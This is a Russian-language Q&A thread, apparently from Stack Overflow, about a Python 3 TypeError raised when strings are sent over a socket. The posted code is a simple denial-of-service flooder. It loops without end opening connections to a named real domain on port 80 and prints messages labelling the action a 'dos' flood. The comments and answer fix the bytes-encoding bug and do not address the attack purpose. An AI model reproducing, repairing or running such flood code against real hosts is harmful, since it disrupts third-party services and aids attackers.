# TypeError: 'str' does not support the buffer interface (SOCKET)

Tags: python, python-3.x, сокет

Ошибка

> TypeError: 'str' does not support the buffer interface

не понимаю из-за чего, уже все методы перепробовал, `int`, `str`, ничего не помогает. Главное что это возникло при переустановки Python.

```
# -*- coding: utf-8 -*-
def fpmDosMode():
    import socket
    import urllib3

    userIP = 'aqua-rp.su'
    standartPort = 80

    p = "hello"

    usingProgrammLibs = None
    if usingProgrammLibs:
        import fpProtocol
        fpProtocol.fpmProtocol()

    try:
        while True:

                createSocketStream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                createSocketStream.connect((userIP, standartPort))

                print("[FPD] dos/send/message/flood/standart -none and status_result ; enjoy :D")
                print("/send/flood/1024bytes")

                createSocketStream.send("hello")
                dataEnjoy = createSocketStream.recv(1024)

    except socket.error:
        print("ERROR CONNECTED TO SERVER : ERROR_SOCKET : RESULT 1")

    try:
        while True:

                createSocketBigStream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                createSocketBigStream.connect((userIP, standartPort))

                print("[FPD] dos/send/message/flood/bigstream -none and status_result ; enjoy :D")
                print("/send/flood/11024bytes")

                createSocketBigStream.send("hello")
                dataBigStreamEnjoy = createSocketBigStream.recv(11024)

    except socket.error as e:
        print("ERROR CONNECTED TO SERVER : ERROR_SOCKET")
```

Comment: В какой строке исключение? `createSocketStream.send("hello")` - в этой?  Нужно отправлять `byte_array`, а не строку (`socket.send(bytes[, flags])`).

Comment: И еще, какой смысл присвоить переменной `usingProgrammLibs` значение `None`, а в следующей строке проверять на истину?

Answer (score 4):

TCP сокет это поток байт, а не Юникодных символов.

Если вы хотите текст отправлять, то необходимо его закодировать в байты, используя подходящую кодировку:

```
bytestring = unicode_text.encode(character_encoding)
sock.sendall(bytestring)
```

> Главное что это возникло при переустановки Python.

Раньше у вас вероятно Питон 2 стоял, где `"hello"` является последовательностью байт. На Питоне 3, `"hello"` создаёт Unicode строку. См. [Байты - перевод из строки](https://ru.stackoverflow.com/q/496420/23044).